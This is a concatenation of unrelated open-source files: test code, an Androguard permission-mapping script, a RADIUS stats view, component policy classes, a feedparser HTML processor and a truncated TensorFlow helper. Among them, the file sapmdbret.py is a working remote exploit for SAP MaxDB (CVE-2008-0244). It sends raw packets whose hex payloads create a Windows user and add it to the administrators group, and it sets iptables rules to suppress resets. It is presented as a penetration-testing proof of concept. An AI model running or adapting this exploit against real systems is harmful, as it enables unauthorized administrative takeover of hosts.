            FIXTURE_USER_INPUT,
        )

    assert result2["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
    # credentials from user input must be stored verbatim in the entry
    assert result2["data"][CONF_USERNAME] == FIXTURE_USER_INPUT[CONF_USERNAME]
    assert result2["data"][CONF_PASSWORD] == FIXTURE_USER_INPUT[CONF_PASSWORD]
| apache-2.0 |
code4bones/androguard | tools/permissions/extract_api_permission_mappings.py | 14 | 9326 | #!/usr/bin/env python
# This file is part of Androguard.
#
# This is a tool to extract permissions and permission groups from Android Open Source Project.
# The information about the permissions and permission groups is appended to a file, which is
# later used in Androguard project.
#
# Author: Yury Zhauniarovich
#
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#CONSTANTS
# Input: PScout result folder for one Android API level (adjust per run).
PATH_TO_PSCOUT_FOLDER = "/home/yury/TMP/PScout/results/API_09"
API_VERSION = 9

# Output: androguard package directory the generated module is written into.
MAPPINGS_MODULE_PATH = "../../androguard/core/api_specific_resources/api_permission_mappings/" #where to append the results
MAPPINGS_MODULE_NAME = "api_permission_mappings"

# PScout input file names and the dict names emitted in the generated module.
PSCOUT_METHOD_MAPPING_FILENAME = "allmappings"
PSCOUT_CONTENTPROVIDERFIELDS_MAPPING_FILENAME = "contentproviderfieldpermission"
METHODS_MAPPING_PARAM_NAME = "AOSP_PERMISSIONS_BY_METHODS"
FIELDS_MAPPING_PARAM_NAME = "AOSP_PERMISSIONS_BY_FIELDS"
#IMPORTS
import os, re, codecs
#auxiliary
# JVM type-descriptor character -> Java primitive type name.
TYPE_DESCRIPTOR = {
    'V': 'void',
    'Z': 'boolean',
    'B': 'byte',
    'S': 'short',
    'C': 'char',
    'I': 'int',
    'J': 'long',
    'F': 'float',
    'D': 'double',
}

# Inverse mapping: Java primitive type name -> descriptor character.
# Derived from TYPE_DESCRIPTOR so the two tables can never drift apart
# (previously this was a second hand-maintained literal).
DESCRIPTOR_TYPE = dict((v, k) for k, v in TYPE_DESCRIPTOR.items())
def countBrackets(atype):
    """Return the number of '[]' (array) bracket pairs in a Java type string."""
    # whitespace is tolerated between the brackets, e.g. 'byte[ ]'
    return len(re.findall(r'\[\s*\]', atype))
def transformClassParam(atype):
    """Convert a Java type (possibly an array, e.g. 'int[][]') into its JVM
    descriptor form (e.g. '[[I'); non-primitive types become 'Lpkg/Class;'."""
    res = ""
    arrDim = countBrackets(atype)
    if arrDim > 0:
        # strip the '[]' suffixes, keeping only the element type
        pos = atype.find('[')
        atype = atype[0 : pos].strip()
        # one leading '[' per array dimension, per JVM descriptor rules
        res = '['*arrDim
    if atype in DESCRIPTOR_TYPE:
        res += DESCRIPTOR_TYPE[atype]
    else:
        res += FormatClassToJava(atype)
    return res
def FormatClassToJava(input):
    """
    Transoform a typical xml format class into java format

    :param input: the input class name, e.g. 'java.lang.String'
    :rtype: string, e.g. 'Ljava/lang/String;'
    """
    return "L%s;" % input.replace(".", "/")
def parseMethod(methodString):
    """Split a signature like 'void setPersistent(boolean)' into
    (method_name, [param_types], return_type)."""
    sig = methodString.strip()
    open_pos = sig.find('(')
    close_pos = sig.find(')')

    # parameter types, comma separated; '()' yields [''] (filtered by callers)
    params = [p.strip() for p in sig[open_pos + 1 : close_pos].split(',')]

    # everything before '(' is '<return type> <method name>'
    prefix = sig[:open_pos].strip()
    split_pos = prefix.rfind(' ')
    method_name = prefix[split_pos + 1 :].strip()
    return_type = prefix[:split_pos].strip()
    return (method_name, params, return_type)
#end of auxiliary
print "Starting conversion of PScout data: [%s]" % PATH_TO_PSCOUT_FOLDER

# Make sure the output package directory exists before writing into it.
if not os.path.exists(MAPPINGS_MODULE_PATH):
    os.makedirs(MAPPINGS_MODULE_PATH)

print "Checking if we already have the file with the version %d..." % API_VERSION
api_specific_mappings_module_name = "%s_api%s.py" % (MAPPINGS_MODULE_NAME, API_VERSION)
api_specific_mappings_module_path = os.path.join(MAPPINGS_MODULE_PATH, api_specific_mappings_module_name)
# Refuse to overwrite an existing mapping module; delete it manually to regenerate.
if os.path.exists(api_specific_mappings_module_path):
    print "API specific file for this version already exists!"
    print "If you want create a file for newer version, please, delete file: %s" % api_specific_mappings_module_path
    exit(1)

print "Reading method mapping file..."
pscout_method_mapping_filepath = os.path.join(PATH_TO_PSCOUT_FOLDER, PSCOUT_METHOD_MAPPING_FILENAME)
methods_mapping_file_lines = []
with open(pscout_method_mapping_filepath, 'r') as pscout_file:
    methods_mapping_file_lines = pscout_file.readlines()

print "Starting to parse file: [%s]" % pscout_method_mapping_filepath
# Parse PScout's 'allmappings' format:
#   Permission:<name>            starts a new permission section
#   <Class: ret method(args)>    one API method protected by that permission
perm_name = None
methods_mapping = {}  # "Lpkg/Class;-name-(params)ret" -> set of permission names
for line in methods_mapping_file_lines:
    line = line.strip()
    if line.startswith("Permission:"):
        perm_name = line.split("Permission:")[1].strip()
        print "PROCESSING PERMISSIONS: %s" % perm_name
    elif line.startswith("<"):
        # '<android.app.Activity: void setPersistent(boolean)>'
        class_method = line[line.find('<') + 1 : line.rfind('>')]
        sepPos = class_method.find(':')
        className = class_method[0 : sepPos].strip()
        methodStr = class_method[sepPos + 1 :].strip()
        methodName, params, returnValue = parseMethod(methodStr)

        # build the space-separated descriptor string of the parameter types
        modParStr = ""
        for par in params:
            if par != "":
                modParStr += transformClassParam(par) + ' '
        modParStr = modParStr.strip()

        # androguard-style method identifier
        method_identificator = "%s-%s-(%s)%s" % (transformClassParam(className), methodName, modParStr, transformClassParam(returnValue))
        try:
            methods_mapping[method_identificator].add(perm_name)
        except KeyError:
            methods_mapping[method_identificator] = set()
            methods_mapping[method_identificator].add(perm_name)
print "Reading contentproviderfield mapping file..."
pscout_contentproviderfields_mapping_filepath = os.path.join(PATH_TO_PSCOUT_FOLDER, PSCOUT_CONTENTPROVIDERFIELDS_MAPPING_FILENAME)
contentproviderfields_mapping_file_lines = []
with open(pscout_contentproviderfields_mapping_filepath, 'r') as pscout_file:
    contentproviderfields_mapping_file_lines = pscout_file.readlines()

# Parse the 'contentproviderfieldpermission' format:
#   PERMISSION:<name>           starts a new permission section
#   <Class: type FIELD_NAME>    one content-provider field guarded by it
perm_name = None
fields_mapping = {}  # "Lpkg/Class;-FIELD_NAME-type" -> set of permission names
for line in contentproviderfields_mapping_file_lines:
    line = line.strip()
    if line.startswith("PERMISSION:"):
        perm_name = line.split("PERMISSION:")[1].strip()
        print "PROCESSING PERMISSIONS: %s" % perm_name
    elif line.startswith("<"):
        field_entry = line[line.find('<') + 1 : line.rfind('>')]
        classNameSepPos = field_entry.find(':')
        className = field_entry[0 : classNameSepPos].strip()
        # remainder is '<field type> <FIELD_NAME>'
        proto_name_str = field_entry[classNameSepPos + 1 :].strip()
        proto_name_parts = proto_name_str.split()
        proto = proto_name_parts[0].strip()
        name = proto_name_parts[1].strip()
        field_identificator = "%s-%s-%s" % (transformClassParam(className), name, transformClassParam(proto))
        try:
            fields_mapping[field_identificator].add(perm_name)
        except KeyError:
            fields_mapping[field_identificator] = set()
            fields_mapping[field_identificator].add(perm_name)
print "Appending found information to the mappings file..."
# Emit the generated module: header boilerplate, then the two mapping dicts.
with codecs.open(api_specific_mappings_module_path, 'w', 'utf-8') as perm_py_module:
    perm_py_module.write('#!/usr/bin/python\n')
    perm_py_module.write('# -*- coding: %s -*-\n\n' % 'utf-8')
    perm_py_module.write('# This file is a part of Androguard.\n')
    perm_py_module.write('#\n')
    perm_py_module.write('# This file is generated automatically from the data\n')
    perm_py_module.write('# provided by PScout tool [http://pscout.csl.toronto.edu/]\n')
    perm_py_module.write('# using script: %s\n' % os.path.basename(__file__))
    perm_py_module.write('#\n')
    perm_py_module.write('# Author: Yury Zhauniarovich\n')
    perm_py_module.write('#\n')
    perm_py_module.write('#\n')
    perm_py_module.write('# Licensed under the Apache License, Version 2.0 (the "License");\n')
    perm_py_module.write('# you may not use this file except in compliance with the License.\n')
    perm_py_module.write('# You may obtain a copy of the License at\n')
    perm_py_module.write('#\n')
    perm_py_module.write('#      http://www.apache.org/licenses/LICENSE-2.0\n')
    perm_py_module.write('#\n')
    perm_py_module.write('# Unless required by applicable law or agreed to in writing, software\n')
    perm_py_module.write('# distributed under the License is distributed on an "AS-IS" BASIS,\n')
    perm_py_module.write('# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n')
    perm_py_module.write('# See the License for the specific language governing permissions and\n')
    perm_py_module.write('# limitations under the License"\n\n')
    perm_py_module.write('#################################################\n')
    perm_py_module.write('### API version: %d \n' % API_VERSION)
    perm_py_module.write('#################################################\n\n\n')

    # method-id -> [permissions] dict literal
    perm_py_module.write("%s = {\n" % METHODS_MAPPING_PARAM_NAME)
    for method in methods_mapping.keys():
        permissions = methods_mapping.get(method)
        perms_string = ", ".join(["'%s'" % prm for prm in permissions])
        perm_py_module.write("\t'%s' : [%s],\n" % (method, perms_string))
    perm_py_module.write("}\n\n")

    # field-id -> [permissions] dict literal
    perm_py_module.write("%s = {\n" % FIELDS_MAPPING_PARAM_NAME)
    for field in fields_mapping.keys():
        permissions = fields_mapping.get(field)
        perms_string = ", ".join(["'%s'" % prm for prm in permissions])
        perm_py_module.write("\t'%s' : [%s],\n" % (field, perms_string))
    perm_py_module.write("}\n")
    perm_py_module.write("#################################################\n")

print "Done..."
davislidaqing/Mcoderadius | toughradius/console/admin/online_stat.py | 5 | 2448 | #!/usr/bin/env python
# coding:utf-8
from bottle import Bottle
from bottle import request
from bottle import response
from bottle import redirect
from bottle import static_file
from bottle import mako_template as render
from tablib import Dataset
from toughradius.console.websock import websock
from toughradius.console import models
from toughradius.console.libs import utils
from toughradius.console.base import *
from toughradius.console.admin import forms
import bottle
import datetime
from sqlalchemy import func
__prefix__ = "/online_stat"
app = Bottle()
app.config['__prefix__'] = __prefix__
###############################################################################
# ops log manage
###############################################################################
def default_start_end():
    """Return (begin, end) UNIX timestamps spanning the whole current day."""
    today = datetime.datetime.now().strftime("%Y-%m-%d")
    fmt = "%Y-%m-%d %H:%M:%S"
    day_start = datetime.datetime.strptime("%s 00:00:00" % today, fmt)
    day_end = datetime.datetime.strptime("%s 23:59:59" % today, fmt)
    return time.mktime(day_start.timetuple()), time.mktime(day_end.timetuple())
@app.get('/', apply=auth_opr)
def online_stat_query(db, render):
    """Render the online-user statistics page, pre-filled with the operator's
    node list and today's date."""
    return render(
        "stat_online",
        node_list=get_opr_nodes(db),
        node_id=None,
        day_code=utils.get_currdate()
    )
@app.route('/data', apply=auth_opr, method=['GET', 'POST'])
def online_stat_data(db, render):
    """Return per-day online-user counts as chart series data.

    Request params (both optional):
      node_id  -- restrict to one node; otherwise all nodes visible to the operator
      day_code -- 'YYYY-MM-DD' day to chart; defaults to today
    """
    node_id = request.params.get('node_id')
    day_code = request.params.get('day_code')
    opr_nodes = get_opr_nodes(db)
    if not day_code:
        day_code = utils.get_currdate()
    # whole-day [00:00:00, 23:59:59] window as UNIX timestamps
    begin = datetime.datetime.strptime("%s 00:00:00" % day_code, "%Y-%m-%d %H:%M:%S")
    end = datetime.datetime.strptime("%s 23:59:59" % day_code, "%Y-%m-%d %H:%M:%S")
    begin_time, end_time = time.mktime(begin.timetuple()), time.mktime(end.timetuple())
    _query = db.query(models.SlcRadOnlineStat)
    if node_id:
        _query = _query.filter(models.SlcRadOnlineStat.node_id == node_id)
    else:
        # no explicit node: limit to the nodes this operator may see
        _query = _query.filter(models.SlcRadOnlineStat.node_id.in_([i.id for i in opr_nodes]))
    _query = _query.filter(
        models.SlcRadOnlineStat.stat_time >= begin_time,
        models.SlcRadOnlineStat.stat_time <= end_time,
    )
    # stat_time is in seconds; the chart frontend expects milliseconds
    _data = [(q.stat_time * 1000, q.total) for q in _query]
    return dict(code=0, data=[{'data': _data}])
permit.add_route("/online_stat", u"在线用户统计", MenuStat, is_menu=True, order=1) | agpl-3.0 |
ltucker/giblets | giblets/policy.py | 1 | 3816 | import fnmatch
import re
from giblets.core import _component_id
__all__ = ['Blacklist', 'Whitelist', 'Patterns']
class Blacklist(object):
    """
    policy that activates all Components that
    have not been specifically disabled.
    """

    def __init__(self):
        # set of component ids that must not be activated
        self.blacklist = set()

    def enable_component(self, component):
        """
        Allow the component specified to be activated
        for this ComponentManager.

        component may be a full class name string 'foo.bar.Quux'
        a Component type or an instance of a Component.
        """
        # set.discard is a no-op when absent; replaces try/remove/except KeyError
        self.blacklist.discard(_component_id(component))

    def disable_component(self, component):
        """
        Do not allow the component specified to be activated
        for this ComponentManager.

        component may be a full class name string 'foo.bar.Quux'
        a Component type or an instance of a Component.
        """
        self.blacklist.add(_component_id(component))

    def is_component_enabled(self, component):
        """
        returns True unless the component specified
        has been disabled.
        """
        return _component_id(component) not in self.blacklist
class Whitelist(object):
    """
    Policy that activates only Components
    that have been specifically enabled.
    """

    def __init__(self):
        # set of component ids that are allowed to activate
        self.whitelist = set()

    def enable_component(self, component):
        """
        Allow the component specified to be activated
        for this ComponentManager.

        component may be a full class name string 'foo.bar.Quux'
        a Component type or an instance of a Component.
        """
        self.whitelist.add(_component_id(component))

    def disable_component(self, component):
        """
        Do not allow the component specified to be activated
        for this ComponentManager.

        component may be a full class name string 'foo.bar.Quux'
        a Component type or an instance of a Component.
        """
        # set.discard is a no-op when absent; replaces try/remove/except KeyError
        self.whitelist.discard(_component_id(component))

    def is_component_enabled(self, component):
        """
        returns False unless the component specified has been
        enabled.
        """
        return _component_id(component) in self.whitelist
class Patterns(object):
    """
    A policy which enables and disables components
    based on an ordered list of wildcard patterns like foo.bar.*
    etc. First match is taken.
    """

    def __init__(self):
        # ordered list of (compiled_regex, enabled_flag) pairs; first match wins
        self.patterns = []

    def build_pattern(self, pattern, enable):
        """
        create an entry suitable for insertion into the
        patterns list of this manager.

        If pattern is a string, it is
        treated as a wildcard patten like foo.bar.*
        Otherwise, it is assumed pattern is a compiled
        regular expression.

        eg:
        pat = mgr.build_pattern('foo.*', True)
        mgr.patterns.insert(0, pat)
        """
        # NOTE: basestring exists only in Python 2; this module targets Python 2.
        if isinstance(pattern, basestring):
            pattern = re.compile(fnmatch.translate(pattern))
        return (pattern, enable)

    def append_pattern(self, pattern, enable):
        """
        helper to add a pattern to the end of the
        list of patterns.
        """
        pat = self.build_pattern(pattern, enable)
        self.patterns.append(pat)

    def is_component_enabled(self, component):
        # disabled by default unless a pattern matches and enables it
        enabled = False
        comp_id = _component_id(component)
        for (pat, state) in self.patterns:
            if pat.match(comp_id) is not None:
                enabled = state
                break
        return enabled
| bsd-3-clause |
fernandog/Medusa | ext/feedparser/html.py | 43 | 7922 | from __future__ import absolute_import, unicode_literals
import re
try:
from html.entities import name2codepoint
except ImportError:
from htmlentitydefs import name2codepoint
from .sgml import *
# Windows-1252 code points 0x80-0x9f mapped to the Unicode characters they
# actually represent; numeric character references in this range are commonly
# (mis)used by documents that claim to be ISO-8859-1/Unicode.
_cp1252 = {
    128: '\u20ac',  # euro sign
    130: '\u201a',  # single low-9 quotation mark
    131: '\u0192',  # latin small letter f with hook
    132: '\u201e',  # double low-9 quotation mark
    133: '\u2026',  # horizontal ellipsis
    134: '\u2020',  # dagger
    135: '\u2021',  # double dagger
    136: '\u02c6',  # modifier letter circumflex accent
    137: '\u2030',  # per mille sign
    138: '\u0160',  # latin capital letter s with caron
    139: '\u2039',  # single left-pointing angle quotation mark
    140: '\u0152',  # latin capital ligature oe
    142: '\u017d',  # latin capital letter z with caron
    145: '\u2018',  # left single quotation mark
    146: '\u2019',  # right single quotation mark
    147: '\u201c',  # left double quotation mark
    148: '\u201d',  # right double quotation mark
    149: '\u2022',  # bullet
    150: '\u2013',  # en dash
    151: '\u2014',  # em dash
    152: '\u02dc',  # small tilde
    153: '\u2122',  # trade mark sign
    154: '\u0161',  # latin small letter s with caron
    155: '\u203a',  # single right-pointing angle quotation mark
    156: '\u0153',  # latin small ligature oe
    158: '\u017e',  # latin small letter z with caron
    159: '\u0178',  # latin capital letter y with diaeresis
}
class _BaseHTMLProcessor(sgmllib.SGMLParser, object):
    """SGML-based parser that regenerates the HTML it consumes.

    Handler methods append re-serialized markup fragments to self.pieces;
    output() joins them back into a single string.  Subclasses override the
    handlers to sanitize or rewrite the document on the way through.

    NOTE: several string literals below re-escape markup as entities
    (&lt;, &gt;, &quot;, &#39;, &amp;).  A previous copy of this file had been
    run through an entity decoder, which corrupted those literals (and left
    the file unparseable, e.g. replace(''', "'")); they are restored here to
    match upstream feedparser.
    """

    special = re.compile('''[<>'"]''')
    # an '&' that does not start a character/entity reference
    bare_ampersand = re.compile("&(?!#\d+;|#x[0-9a-fA-F]+;|\w+;)")
    # HTML void elements: serialized as <tag /> and never given an end tag
    elements_no_end_tag = set([
        'area', 'base', 'basefont', 'br', 'col', 'command', 'embed', 'frame',
        'hr', 'img', 'input', 'isindex', 'keygen', 'link', 'meta', 'param',
        'source', 'track', 'wbr'
    ])

    def __init__(self, encoding=None, _type='application/xhtml+xml'):
        if encoding:
            self.encoding = encoding
        self._type = _type
        super(_BaseHTMLProcessor, self).__init__()

    def reset(self):
        # accumulated output fragments, joined by output()
        self.pieces = []
        sgmllib.SGMLParser.reset(self)

    def _shorttag_replace(self, match):
        # normalize '<tag/>': void elements keep the XML form, others get
        # an explicit empty start/end pair
        tag = match.group(1)
        if tag in self.elements_no_end_tag:
            return '<' + tag + ' />'
        else:
            return '<' + tag + '></' + tag + '>'

    # By declaring these methods and overriding their compiled code
    # with the code from sgmllib, the original code will execute in
    # feedparser's scope instead of sgmllib's. This means that the
    # `tagfind` and `charref` regular expressions will be found as
    # they're declared above, not as they're declared in sgmllib.
    def goahead(self, i):
        pass
    try:
        goahead.__code__ = sgmllib.SGMLParser.goahead.__code__
    except AttributeError:
        goahead.func_code = sgmllib.SGMLParser.goahead.func_code

    def __parse_starttag(self, i):
        pass
    try:
        __parse_starttag.__code__ = sgmllib.SGMLParser.parse_starttag.__code__
    except AttributeError:
        __parse_starttag.func_code = sgmllib.SGMLParser.parse_starttag.func_code

    def parse_starttag(self, i):
        j = self.__parse_starttag(i)
        if self._type == 'application/xhtml+xml':
            # synthesize the end-tag event for XML empty elements '<tag/>'
            if j > 2 and self.rawdata[j-2:j] == '/>':
                self.unknown_endtag(self.lasttag)
        return j

    def feed(self, data):
        # escape '<!' sequences that do not introduce a declaration/comment/CDATA
        data = re.compile(r'<!((?!DOCTYPE|--|\[))', re.IGNORECASE).sub(r'&lt;!\1', data)
        # normalize XML empty-element syntax before sgmllib sees it
        data = re.sub(r'<([^<>\s]+?)\s*/>', self._shorttag_replace, data)
        data = data.replace('&#39;', "'")
        data = data.replace('&#34;', '"')
        sgmllib.SGMLParser.feed(self, data)
        sgmllib.SGMLParser.close(self)

    def normalize_attrs(self, attrs):
        if not attrs:
            return attrs
        # utility method to be called by descendants
        # lowercase attribute names (last occurrence wins), lowercase the
        # values of rel/type, and sort for a stable serialization
        attrs = dict([(k.lower(), v) for k, v in attrs]).items()
        attrs = [(k, k in ('rel', 'type') and v.lower() or v) for k, v in attrs]
        attrs.sort()
        return attrs

    def unknown_starttag(self, tag, attrs):
        # called for each start tag
        # attrs is a list of (attr, value) tuples
        # e.g. for <pre class='screen'>, tag='pre', attrs=[('class', 'screen')]
        uattrs = []
        strattrs = ''
        if attrs:
            for key, value in attrs:
                # re-escape markup characters and bare ampersands in the value
                value = value.replace('>', '&gt;').replace('<', '&lt;').replace('"', '&quot;')
                value = self.bare_ampersand.sub("&amp;", value)
                uattrs.append((key, value))
            strattrs = ''.join([' %s="%s"' % (key, value) for key, value in uattrs])
        if tag in self.elements_no_end_tag:
            self.pieces.append('<%s%s />' % (tag, strattrs))
        else:
            self.pieces.append('<%s%s>' % (tag, strattrs))

    def unknown_endtag(self, tag):
        # called for each end tag, e.g. for </pre>, tag will be 'pre'
        # Reconstruct the original end tag.
        if tag not in self.elements_no_end_tag:
            self.pieces.append("</%s>" % tag)

    def handle_charref(self, ref):
        # called for each character reference, e.g. for '&#160;', ref will be '160'
        # Reconstruct the original character reference.
        ref = ref.lower()
        if ref.startswith('x'):
            value = int(ref[1:], 16)
        else:
            value = int(ref)
        if value in _cp1252:
            # rewrite cp1252 code points as references to the real Unicode char
            self.pieces.append('&#%s;' % hex(ord(_cp1252[value]))[1:])
        else:
            self.pieces.append('&#%s;' % ref)

    def handle_entityref(self, ref):
        # called for each entity reference, e.g. for '&copy;', ref will be 'copy'
        # Reconstruct the original entity reference.
        if ref in name2codepoint or ref == 'apos':
            self.pieces.append('&%s;' % ref)
        else:
            # unknown entity: escape the ampersand, keep the text
            self.pieces.append('&amp;%s' % ref)

    def handle_data(self, text):
        # called for each block of plain text, i.e. outside of any tag and
        # not containing any character or entity references
        # Store the original text verbatim.
        self.pieces.append(text)

    def handle_comment(self, text):
        # called for each HTML comment, e.g. <!-- insert Javascript code here -->
        # Reconstruct the original comment.
        self.pieces.append('<!--%s-->' % text)

    def handle_pi(self, text):
        # called for each processing instruction, e.g. <?instruction>
        # Reconstruct original processing instruction.
        self.pieces.append('<?%s>' % text)

    def handle_decl(self, text):
        # called for the DOCTYPE, if present, e.g.
        # <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
        #     "http://www.w3.org/TR/html4/loose.dtd">
        # Reconstruct original DOCTYPE
        self.pieces.append('<!%s>' % text)

    _new_declname_match = re.compile(r'[a-zA-Z][-_.a-zA-Z0-9:]*\s*').match

    def _scan_name(self, i, declstartpos):
        # more lenient declaration-name scanner than sgmllib's default
        rawdata = self.rawdata
        n = len(rawdata)
        if i == n:
            return None, -1
        m = self._new_declname_match(rawdata, i)
        if m:
            s = m.group()
            name = s.strip()
            if (i + len(s)) == n:
                return None, -1  # end of buffer
            return name.lower(), m.end()
        else:
            self.handle_data(rawdata)
            # self.updatepos(declstartpos, i)
            return None, -1

    def convert_charref(self, name):
        return '&#%s;' % name

    def convert_entityref(self, name):
        return '&%s;' % name

    def output(self):
        '''Return processed HTML as a single string'''
        return ''.join(self.pieces)

    def parse_declaration(self, i):
        try:
            return sgmllib.SGMLParser.parse_declaration(self, i)
        except sgmllib.SGMLParseError:
            # escape the doctype declaration and continue parsing
            self.handle_data('&lt;')
            return i+1
| gpl-3.0 |
gregkcarson/sapmdbret | sapmdbret.py | 1 | 6385 | import sys
import socket
import random
import getopt
from optparse import OptionParser
from scapy.all import *
import os
import signal
from time import sleep, ctime
def main():
print " ^^ just ignore that :) "
print
print "***************************************************************************"
print "* SAPMDBRET - SAP MaxDB Remote Exploit Tool - v1 gregkcarson@gmail.com *"
print "---------------------------------------------------------------------------"
print " 'I thought what I'd do was, I'd pretend I was one of those deaf-mutes.' "
print "---------------------------------------------------------------------------"
print " Tool to use in attacking CVE 2008-0244 SAP MaxDB cons.exe RCE. "
print " For legit pen test and research use only. Although this program works, it"
print " it is still just a PoC and thus some convenient features are missing. "
print " This vulnerability is old but I still see it in a fair number of projects."
print " Thanks to Luigi Auriemma for the assistance."
print
usage = "usage: %prog [options] arg"
parser = OptionParser(usage, version="Welcome to %prog, gregkcarson@gmail.com for questions v1.0")
parser.add_option("-v","--verbose",action="store_true",dest="verbose", help="LOUD NOISES")
parser.add_option("-q","--quiet", action="store_false",dest="verbose", help="shhhhhhh")
parser.add_option("-i","--ip",type="string",dest="victim",help="Specify the victim IP")
parser.add_option("-p","--port",type="int",dest="port",help="Specify the target port we will connect to. If you are running ntpamp then it will override and default to 123.")
options,args=parser.parse_args()
if options.victim is not None:
global victim
victim = options.victim
else:
print "Review usage. See help."
if options.port is not None:
global port
port = options.port
else:
print "Using default port."
port=7210
print "[*]-Port set to: "+str(port)
print "[*]-Victim set to: "+victim
print "... Validating connection to target ..."
print "Attempting to connect to target on %s:%s" % (victim, port)
s = socket.socket()
s.settimeout(2)
try:
s.connect((victim,port))
print
print "Connected successfully to %s on port %s" % (victim, port)
print
s.close()
except socket.error, e:
print
print "Connection failed to %s on port %s failed. Reason: %s" % (victim,port,e)
sys.exit(0)
except KeyboardInterrupt:
print
print "User interrupted connection. Quitting."
sys.exit(0)
print "... Starting Attack Sequence ..."
print
#Scapy uses raw sockets which will confuse the Linux Kernel. SET THE PROPER VALUES
os.system('iptables -A OUTPUT -p tcp -d ATTACKERIP -s VICTIMIP --dport 7210 --tcp-flags RST RST -j DROP')
#Beginning of Attack Sequence
#Change your source IP appropriately
#Establish 3-WHS
ipsection=IP(src="10.0.17.82",dst=victim)
tcpsection=TCP(sport=random.randint(45000,65535),dport=port,flags="S", seq=12345)
zeropacket=ipsection/tcpsection
synack=sr1(zeropacket)
gcack=synack.seq+1
gcackport=synack.dport
print "Following Source Port Was Assigned: "+str(gcackport)
print
ack=TCP(sport=gcackport,dport=port,flags="A",seq=12346,ack=gcack)
send(ipsection/ack)
print "Three Way Handshake Established!"
print
#Protocol Establish Communications
PUSH=TCP(sport=gcackport,dport=port,flags="PA",seq=12346,ack=gcack)
payload1 = (
"\x57\x00\x00\x00\x03\x5b\x00\x00\x01\x00\x00\x00\xff\xff\xff\xff"
"\x00\x00\x04\x00\x57\x00\x00\x00\x00\x02\x3f\x00\x04\x09\x00\x00"
"\x00\x40\x00\x00\xd0\x3f\x00\x00\x00\x40\x00\x00\x70\x00\x00\x00"
"\x00\xc5\x09\x00\xc8\xf6\x08\x00\x00\xe3\x0a\x00\xd4\x00\x00\x00"
"\x07\x49\x31\x30\x31\x36\x00\x04\x50\x1c\x2a\x03\x52\x01\x09\x70"
"\x64\x62\x6d\x73\x72\x76\x00")
firstattack=ipsection/PUSH/Raw(load=payload1)
firstreply=sr1(firstattack)
gcack2=firstreply.ack
ack2=TCP(sport=gcackport,dport=port,flags="A",window=64153,seq=gcack2,ack=firstreply.seq+87)
send(ipsection/ack2)
print "Server Version successfully probed - ACK reply sent - proceeding to commend execution"
print
#net user gregthg 1THGsecret! /ADD <-- If you want a different username and password change the hex accordingly, keep the byte length teh same.
print "...Trying to create user..."
PUSH2=TCP(sport=gcackport,dport=port,flags="PA",seq=gcack2,ack=firstreply.seq+87) #\x2d\x68\x20
payload2 = (
"\x4a\x00\x00\x00\x03\x3f\x00\x00\x01\x00\x00\x00\x54\x0d\x00\x00"
"\x00\x00\x04\x00\x4a\x00\x00\x00\x65\x78\x65\x63\x5f\x73\x64\x62"
"\x69\x6e\x66\x6f\x20\x26\x26\x20\x6e\x65\x74\x20\x75\x73\x65\x72"
"\x20\x67\x72\x65\x67\x74\x68\x67\x20\x31\x54\x48\x47\x73\x65\x63"
"\x72\x65\x74\x21\x20\x2f\x41\x44\x44\x00")
secondattack=ipsection/PUSH2/Raw(load=payload2)
secondreply=sr1(secondattack)
#UNCOMMENT TO EXECUTE THE FOLLOWING COMMAND ON THE TARGET net localgroup administrators gregthg /ADD
print "...Trying to join user to local administrators group..."
print
gcack3=secondreply.ack
PUSH3=TCP(sport=gcackport,dport=port,flags="PA",seq=gcack3,ack=secondreply.seq+74)
payload3 = (
"\x53\x00\x00\x00\x03\x3f\x00\x00\x01\x00\x00\x00\x54\x0d\x00\x00"
"\x00\x00\x04\x00\x53\x00\x00\x00\x65\x78\x65\x63\x5f\x73\x64\x62"
"\x69\x6e\x66\x6f\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61"
"\x6c\x67\x72\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e\x69\x73\x74\x72"
"\x61\x74\x6f\x72\x73\x20\x67\x72\x65\x67\x74\x68\x67\x20\x2f\x41"
"\x44\x44\x00")
thirdattack=ipsection/PUSH3/Raw(load=payload3)
thirdreply=sr1(thirdattack)
#You should now be able to log in via RDP or connect over SMB to the target
print "Attack Sequence Completed - Exiting Program!"
#SET THE PROPER VALUES
os.system('iptables -D OUTPUT -p tcp -d ATTACKERIP -s VICTIMIP --dport 7210 --tcp-flags RST RST -j DROP')
if __name__=='__main__':
main()
| gpl-2.0 |
jinzishuai/learn2deeplearn | deeplearning.ai/C2.ImproveDeepNN/week3/tensorflow_assignment/tf_utils.py | 5 | 4710 | import h5py
import numpy as np
import tensorflow as tf
import math
def load_dataset():
    """Load the SIGNS train/test sets from HDF5 files under datasets/.

    Returns:
        train_set_x_orig -- training set features
        train_set_y_orig -- training labels, reshaped to (1, m_train)
        test_set_x_orig  -- test set features
        test_set_y_orig  -- test labels, reshaped to (1, m_test)
        classes          -- array with the list of class labels
    """
    train_dataset = h5py.File('datasets/train_signs.h5', "r")
    train_set_x_orig = np.array(train_dataset["train_set_x"][:])  # your train set features
    train_set_y_orig = np.array(train_dataset["train_set_y"][:])  # your train set labels

    test_dataset = h5py.File('datasets/test_signs.h5', "r")
    test_set_x_orig = np.array(test_dataset["test_set_x"][:])  # your test set features
    test_set_y_orig = np.array(test_dataset["test_set_y"][:])  # your test set labels

    classes = np.array(test_dataset["list_classes"][:])  # the list of classes

    # labels arrive as flat vectors; reshape to row vectors (1, m)
    train_set_y_orig = train_set_y_orig.reshape((1, train_set_y_orig.shape[0]))
    test_set_y_orig = test_set_y_orig.reshape((1, test_set_y_orig.shape[0]))

    return train_set_x_orig, train_set_y_orig, test_set_x_orig, test_set_y_orig, classes
def random_mini_batches(X, Y, mini_batch_size = 64, seed = 0):
    """
    Creates a list of random minibatches from (X, Y).

    Arguments:
    X -- input data, of shape (input size, number of examples)
    Y -- true "label" vector, of shape (label size, number of examples)
    mini_batch_size -- size of the mini-batches, integer
    seed -- seeds numpy's RNG so the shuffle is reproducible (grading)

    Returns:
